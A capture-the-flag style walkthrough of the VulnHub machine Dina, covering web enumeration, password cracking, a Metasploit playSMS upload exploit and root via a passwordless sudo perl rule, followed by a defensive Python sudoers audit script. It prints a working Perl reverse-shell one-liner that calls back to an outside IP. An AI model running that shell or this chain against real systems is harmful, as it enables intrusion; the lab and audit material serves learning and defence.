Dina 1.0.1 Walkthrough
Dina is a fun, easy vulnerable machine that can be found on VulnHub. Overall I quite enjoyed this box and would definitely recommend it to anyone who is learning, as I am.
Initial Recon
As I mentioned in a previous guide, I typically use arp-scan to find the machine. Starting off, I run nmap on the target; nothing interesting comes up except an Apache server running on port 80. Taking a look in Firefox, we find the site that is running.
Looking at the source code of the HTML page, we find that the “Submit Query” button sends a POST request to /ange1; however, the method attribute on the form is misspelled.
I go ahead and do a curl POST request with an empty body to /ange1 and only get the contents of an empty web directory.
Oh well, that seems to be a dead end. My next standard step is to throw dirb at it with a few wordlists. Using directory-list-2.3-small.txt from the dirbuster wordlist directory, we get a few interesting results back.
Looking in /uploads and /tmp, we find nothing but empty directories. However, in /secure we find an interesting file we can download called backup.zip.
I download it; we will return to it later. Then I take a look at /nothing and get greeted with a cheeky webpage. However, checking out /nothing/pass we get some potential passwords!
Local Work
Attempting to unzip backup.zip fails; it appears the archive is password protected. Running 7z e backup.zip we get a password prompt. Using the password list found earlier at /nothing/pass, we attempt to crack it. On the first try, it looks like the password “freedom” did the trick.
Trying to open the .mp3 file, we find that something is very wrong with it. I cat out the file and it looks to be a text file renamed to .mp3.
This file reveals a new URL to investigate and a potential user/pass login for something.
Getting a Shell
Heading over to /SecreTSMSgatwayLogin we find what seems to be a playSMS service running.
The backup-cred.mp3 file seems to indicate the password is 6 characters long, but before we try any crazy brute-forcing, let us try some of the other passwords I found earlier. Trying them out sequentially, we quickly find that “diana” logs me in.
I trudge around here for a while, noting that I could potentially inject HTML into the page (XSS?), but nothing seems to work. Then I decide to take a peek at Metasploit and see if there are any vulnerabilities associated with playSMS.
Looks like we get some hits. During my poking around earlier I noted there was some ability to upload CSVs, so let us try the CSV-upload exploit.
I ran the exploit and we get greeted with a shell.
Side note: this is a meterpreter shell. To get into a normal shell I used the following sequence of commands.
meterpreter > shell
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Dina:/var/www$ export TERM=xterm
Privilege Escalation
At first I thought the older kernel version might be vulnerable, but nothing really worked. Afterwards I followed a checklist, which said to run sudo -l and see if there is anything you can run without a password.
Interestingly, I can run Perl scripts as sudo without a password. Doing some investigation online, I find the following Perl script for a reverse shell.
perl -e 'use Socket;$i="192.168.1.167";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
After changing the IP and port in the above script, I set up Netcat in my local terminal and ran the script from the user shell, and we get root!
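The root of the privilege escalation is a sudoers rule that lets a low-privilege user run an interpreter as root without a password. As an added example (my own code, not part of the original walkthrough or the Dina box), here is a small Python audit that parses sudoers-style rules and flags any rule granting an interpreter or shell as root, scoring NOPASSWD rules highest. The sample rules, user names and paths are constructed for the example and are assumptions, not the box's real configuration.

```python
"""Audit sudoers-style rules for entries that hand out root code execution.

Added example, not from the walkthrough. It understands the common
`user host=(runas) TAG: cmd, cmd` line shape and flags rules that grant
an interpreter or shell (perl, python, sh, ...) as root, which is the
misconfiguration a `sudo -l` check on the box revealed.
"""
import re
from dataclasses import dataclass

# Binaries that give a full root shell when run unrestricted under sudo.
INTERPRETERS = {
    "perl", "python", "python2", "python3", "ruby", "php", "lua", "node",
    "bash", "sh", "dash", "zsh", "env",
}

# user  host=(runas)  TAG:  cmd1, cmd2   (runas and TAG parts optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:\w+:\s*)*)"
    r"(?P<cmds>.+)$"
)


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool
    severity: str
    reason: str


def parse_rule(line):
    """Return (user, runas, tags, [cmds]) for a user rule, else None."""
    line = line.split("#", 1)[0].strip()          # drop comments / includes
    if not line or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = {t.strip().upper() for t in m.group("tags").split(":") if t.strip()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return m.group("user"), m.group("runas") or "root", tags, cmds


def classify(cmd):
    """Reason string if `cmd` yields arbitrary execution as the runas user, else None."""
    if cmd == "ALL":
        return "any command"
    parts = cmd.split()
    binary = parts[0].rsplit("/", 1)[-1]
    # An interpreter with no fixed arguments, or with a wildcard, runs any code.
    # (A fixed script path is not flagged here; its writability is a separate check.)
    if binary in INTERPRETERS and (len(parts) == 1 or any("*" in p for p in parts[1:])):
        return f"unrestricted interpreter {binary}"
    return None


def audit(sudoers_text):
    """Scan sudoers text and return a list of Finding for risky rules (root's own rules skipped)."""
    findings = []
    for line in sudoers_text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        user, runas, tags, cmds = parsed
        if user == "root":
            continue
        nopasswd = "NOPASSWD" in tags
        for cmd in cmds:
            reason = classify(cmd)
            if reason is None:
                continue
            if nopasswd:
                severity = "critical"       # no password, arbitrary root code
            elif cmd == "ALL":
                severity = "info"           # ordinary admin-group rule, password still required
            else:
                severity = "high"
            findings.append(Finding(user, runas, cmd, nopasswd, severity, reason))
    return findings


# Constructed sample resembling a small sudoers file (user names are assumptions).
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/perl
backup   ALL=(root) NOPASSWD: /usr/bin/rsync -a /var/www /backup/
deploy   ALL=(root) /usr/bin/python3 /opt/deploy.py
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.user} -> ({f.runas}) {f.command}: {f.reason}"
              + (" [NOPASSWD]" if f.nopasswd else ""))
```

On the sample above the audit reports the %sudo group rule as informational and the www-data perl rule as critical; the rsync rule with fixed arguments and the python3 rule pinned to one script are not flagged. The fix the finding points to is to never delegate a bare interpreter via sudo: grant a specific script instead, make sure that script and its directory are root-owned and not writable by the sudoer, and drop NOPASSWD unless a non-interactive job truly needs it.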